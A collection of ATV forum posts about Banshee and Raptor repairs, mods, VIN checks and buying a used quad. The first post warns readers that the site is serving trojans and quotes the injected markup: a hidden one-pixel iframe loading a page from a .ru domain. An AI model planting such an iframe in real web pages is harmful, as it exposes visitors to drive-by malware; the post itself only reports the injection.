In loading this page in the past hour or so I'm getting a bunch of trojan hack attempts, so check your machines out. The site hosting some advertisement was exploited somehow. The line in the page code is this: </head> <body> <iframe src="http://netcash.net.ru/promo.htm" width=1 height=1 style="display:none"></iframe> <div id="ipbwrapper"> Hopefully someone who can do something about it sees this post. THX

Anyone know where someone could go to check the vin# on your shee to verify if it's stolen or not? I saw an earlier post about probs in illinois and don't need mine yanked out from under me now that I've sunk a bunch of time and $ into it. thanks

I need to know where and how to measure a stock head so I don't take .025 off a head that may or may not have been shaved already. thanks

You might be able to find one inexpensive on ebay, but I have had good success buying computers and laptops for my company at discountpc.net. They have a realtime inventory so you would need to check it often. Look for grade A condition laptops and you should have good success. I'm partial to Dell for their reliability and can get them in bulk pricing. Replacement laptop batteries can usually be found at a decent price in some ebay stores. Look for one that has the ethernet and modem ports built in so you can use the accessory ports for something else like a wireless network card or extra memory.

I called up Clark W. Griswald and got his food additive formula and mixed it w/ my mc1 and 93 octane. So not only does it rip, it stays crunchy in milk.

Haven't been since riding in Astoria, IL about 2 months ago. I burned up my stator and another wire. Thats all fixed now but while I had it apart one of the throttle cable retainers flew into the unknown . After checking partsfish and hating the price , I decided to call up some favors from the guys I work with . I had a flat drawing engineered from the retainer I had left, cut it on a waterjet out of 22 gauge galvanized, and bent it to design with 2 pairs of pliers. See pic for comparasin. SHEE will live again within the next week!

75W, 80W, or 85W . . . WTF?

If I recall, f type was developed by or for Ford to increase the friction in the clutch plates. If you use it it will make your clutch grab more or too much. I read this in a 'temporary fix for slipping clutch' article in an MX mag ages ago.... I would do it only it if it was time to ride with friends and I had nothing else to try to keep it from slipping. -
Saw some of those at Farm King 3 miles from my house and didn't want to drop $30 for them. I GOT IT OFF THOUGH!!!! Used an old hand jack handle with the notched end and a pipe wrench the welder said we'll use a hot tack since you don't want to weld on it for very long w/out messing up the threads. Thought I'd share a pic of the victory. Thanks again guys....
-
I'll have access to a welder and someone with the touch tomorrow. I don't weld enough to be sure I wouldn't mess up the threads. thanks alot I'm just trying to replace wheel bearings and I get this trouble.
-
Thanks guys. If I put torch to it, will the plating on the rim come off? Another guy I work with suggested welding another nut to thenut that's stuck. What do you think? thanks
-
Got the right front wheel off w/no problem. Got all but the last wheel nut off the left front and it ended up getting rounded off to where I can't get a grip. With the spindle in the way, I really don't have anything that would be able to get it off. Ideas? thanks

I saw someone was selling some stock intakes modified to accept vforce reeds. Were these what you meant or were the reeds all metal?

How 'bout "Can I poop in your shoe?" -
Did you end up on the seat of your pant pants after this? I haven't picked up a k&n but will have one soon. I have FMF fatty's and good collection of jets to try when this is done. I will be milling the head and porting and polishing the jugs this fall when I tear it down to the frame for powder coating. thanks
-
Perfect. exactly what I was looking for
-
Has anyone successfully modified their stock intake for better airflow? I work in a machine shop and am going to get the flywheel lightened, carbs bored abd mod the stator plate. Any other "poor boy" mods I miss? thanks

Check (disable) the parking brake rev limiter and it should rev out. This happened to my nephew's warrior and it ran fine afterwards......

Thanks for the info guys. Got her a 220 Kawasaki Bayou which doesn't have the manual clutch. She loves it as it's easy to ride and I can use it for work around the place. I got the Raptor and will be fixing it to sell soon.
-
Depending on what I get it for, $2500 to $3000. Thx for the info on the tranny. Since said that I saw a site dedicated to that subject. I'll definatlely be checking that out.

Okay, before getting the expected flame for this, I say that this is only an investment in a repo of an '01 Raptor that will be sold when ready to ride. Very likely to get it for a song! Expected profit will be used to get my wife a easy to ride quad for trails. So 2 things. It's missing the exhaust and shocks. Anything I may need to look out for on this model? Any suggestions for the quad for my wife? She doesn't want one where she has to use the manual clutch.
